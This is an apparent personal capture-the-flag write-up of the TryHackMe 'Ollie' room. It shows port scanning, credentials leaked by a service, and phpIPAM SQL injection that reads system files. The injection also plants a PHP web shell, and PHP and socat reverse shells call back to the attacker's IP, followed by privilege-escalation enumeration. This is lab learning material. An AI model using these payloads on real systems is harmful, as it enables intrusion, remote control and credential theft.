Ollie - {THM} Room
Ollie scratch doc content (to clean up) - making a change from editor :)
VMIP: 10.10.163.9
http://10.10.163.9/index.php?page=login
db_nmap -v -A -p1000-10000 10.10.163.9
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2022-04-09 04:51 BST
[*] Nmap: NSE: Loaded 146 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 04:51
[*] Nmap: Completed NSE at 04:51, 0.00s elapsed
[*] Nmap: Initiating NSE at 04:51
[*] Nmap: Completed NSE at 04:51, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 04:51
[*] Nmap: Scanning 10.10.163.9 [1 port]
[*] Nmap: Completed ARP Ping Scan at 04:51, 0.22s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 04:51
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 04:51, 0.00s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 04:51
[*] Nmap: Scanning ip-10-10-163-9.eu-west-1.compute.internal (10.10.163.9) [9001 ports]
[*] Nmap: Discovered open port 1337/tcp on 10.10.163.9
root@ip-10-10-192-160:~# nc 10.10.163.9 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name? admin
What's up, Admin! It's been a while. What are you here for? password
Ya' know what? Admin. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
Username: admin
Password: OllieUnixMontgomery!
PS: Good luck and next time bring some treats!
thanks! bringing treats, piles of treats you magnificent bastard!
https://fluidattacks.com/advisories/mercury/
Input (filter SQLi):
" union select 1,1,user(),1 -- -
1/phpipam_ollie@localhost (1)
" union select user(),1,1,load_file('/etc/passwd') -- -
phpipam_ollie@localhost/1 (root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing
List
Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats
Bug-Reporting
System
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd
Network
Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd
Time
Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM
software
stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux
daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ollie:x:1000:1000:ollie
unix
montgomery:/home/ollie:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin )
" union select user(),1,1,load_file('/etc/group') -- -
phpipam_ollie@localhost/1 (root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,ollie tty:x:5:syslog disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24:ollie floppy:x:25: tape:x:26: sudo:x:27: audio:x:29: dip:x:30:ollie www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46:ollie staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: systemd-timesync:x:104: crontab:x:105: messagebus:x:106: input:x:107: kvm:x:108: render:x:109: syslog:x:110: tss:x:111: uuidd:x:112: tcpdump:x:113: ssh:x:114: landscape:x:115: lxd:x:116: systemd-coredump:x:999: ollie:x:1000: ssl-cert:x:117: mysql:x:118: docker:x:119: )
" union select 1,'','','' into outfile '/var/www/html/test.php' -- -
" union select 1,2,3,'<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php' -- -
http://10.10.163.9/cmd.php?cmd=whoami
1 2 3 www-data
http://10.10.163.9/cmd.php?cmd=uname%20-a
1 2 3 Linux hackerdog 5.4.0-99-generic #112-Ubuntu SMP Thu Feb 3 13:50:55 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
http://10.10.163.9/cmd.php?cmd=ls%20-al%20/home/ollie/
1 2 3
total 36
drwxr-xr-x 5 ollie ollie 4096 Feb 10 03:22 .
drwxr-xr-x 3 root root 4096 Feb 6 15:17 ..
lrwxrwxrwx 1 root root 9 Feb 6 15:29 .bash_history -> /dev/null
-rw-r--r-- 1 ollie ollie 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ollie ollie 3771 Feb 25 2020 .bashrc
drwx------ 2 ollie ollie 4096 Feb 6 15:19 .cache
drwxrwxr-x 3 ollie ollie 4096 Feb 6 15:46 .config
drwxrwxr-x 3 ollie ollie 4096 Feb 6 15:20 .local
-rw-r--r-- 1 ollie ollie 807 Feb 25 2020 .profile
-rw-r--r-- 1 ollie ollie 0 Feb 10 03:21 .sudo_as_admin_successful
-r-x------ 1 ollie ollie 29 Feb 10 03:22 user.txt
" union select 1,'','','' into outfile '/var/www/html/test.php' -- -
" union select 1,2,3,'<?php $sock=fsockopen("10.6.18.225",1337);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' into outfile '/var/www/html/sh.php' -- -
socat file:`tty`,raw,echo=0 TCP-L:4242
http://10.10.163.9/cmd.php?cmd=socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:10.6.18.225:4242
su - ollie (same password :P)
cat user.txt
THM{*********}
ollie@hackerdog:/etc$ find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | sort | uniq
at
chfn
chsh
dbus-daemon-launch-helper
dmcrypt-get-device
fusermount
gpasswd
mount
newgrp
passwd
ping
pkexec
polkit-agent-helper-1
snap-confine
ssh-keysign
su
sudo
umount
ollie@hackerdog:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
ollie@hackerdog:/etc/cron.d$ cat /etc/passwd | cut -d: -f1 # List of users
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-network
systemd-resolve
systemd-timesync
messagebus
syslog
_apt
tss
uuidd
tcpdump
landscape
pollinate
usbmux
sshd
systemd-coredump
ollie
lxd
mysql
dnsmasq
User history
ollie@hackerdog:/etc$ history
1 sudo apt update
2 cat /etc/fstab
3 ls
4 history
5 ls -al
6 cd /etc
7 ls -al
8 ps axjf
9 cat /usr/share/unattended-upgrades/unattended-upgrade-shutdown
10 ps aux
11 docker
12 which docker
13 docker ps
14 find / -perm -u=s -type f 2>/dev/null
15 cat /etc/profile
16 cat /etc/bash.bashrc
17 cat /etc/bash.bashrc | grep -i path
18 cat /etc/* | grep -i path
19 cat /etc/* | grep -i path 2>/dev/null
20 find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
21 cd /usr/bin
22 ls -al
23 echo $PATH
24 cd /usr/games
25 ls -al
26 touch test
27 cd ../local/sbin
28 touch po
29 cd /tmp
30 ls
31 cat poop
32 cat test.php
33 ls -al
34 ls -al | grep mysql
35 cd ~
36 ls
37 ls -al
38 cd /etc
39 ls -al
40 find / -perm -u=s -type f 2>/dev/null
41 which update-alternatives
42 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | uniq
43 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | sort | uniq
44 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | sort | uniq
45 getcap -r / 2>/dev/null
46 cat /etc/crontab
47 which run-parts
48 vim /usr/bin/run
49 vim /usr/bin/run-parts
50 sudo -l
51 uname -a
52 cat /etc/profile
53 cat /etc/bashrc
54 env
55 cat /proc/version
56 uname -mrs
57 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
58 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
59 crontab -l
60 cat /etc/anacrontab
61 cat /etc/crontab
62 cd /etc/cron
63 ls
64 cd /etc/cron.hourly/
65 ls
66 cd ../cron.d
67 ls
68 ls -al
69 cat popularity-contest
70 cat *
71 ls -al /usr/lib/php/sessionclean
72 ls -al /sbin/e2scrub_all
73 ls -al /run/systemd/system
74 ls -al /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
75 grep -RHin "exec" .
76 grep -RHin "conf" .
77 cat /etc/cron.daily/popularity-contest
78 ls -al /etc/cron.daily/popularity-contest
79 popularity-contest
80 cd ~
81 cd /etc/cron.d
82 ls
83 cat e2scrub_all
84 cat php
85 cat popularity-contest
86 cd /usr/lib/php
87 ls -al
88 cd /etc/cron.d
89 ls
90 cat popularity-contest
91 cat /etc/crontab
92 anacron -h
93 test -x /usr/sbin/anacron
94 echo $?
95 echo "poo" > /usr/sbin/anacron
96 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
97 snap --version
98 cat /etc/security/opasswd
99 strings /dev/mem -n10 | grep -i PASS
100 locate password
101 find / -type f -name *password*
102 find / -type f -name *password* 2>/dev/null
103 cat /etc/pam.d/common-password
104 cat /var/cache/debconf/passwords.dat
105 ifconfig
106 cat /etc/resolv.conf
107 lsof -i
108 cat /etc/passwd | cut -d: -f1 # List of users
109 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
110 awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
111 cat /etc/sudoers
112 ls -alh /var/mail/
113 ls -ahlR /root/
114 vim /root/.ssh/authorized_keys
115 ls -alhR /var/www/html/
116 df -h
117 mount
118 history
119 grep --color=auto -rnw '/' -ie "root_squash" --color=always 2>/dev/null
120 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config
121 getcap -r /usr/bin
122 find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
123 vim $(which feedme)
124 which feedme
125 cat /usr/bin/feedme
126 vim /usr/bin/feedme
127 feedme
128 cd /
129 grep -Rn feedme .
130 chmod +x /usr/bin/feedme
131 cd /usr/bin
132 ls -al | grep olli
133 cd /etc/
134 grep -RHn "feedme" . 2>/dev/null
135 service feedme status
136 vim /usr/bin/feedme
137 service feedme status
138 service feedme restart
139 feedme
140 service feedme restart
141 service feedme status
142 history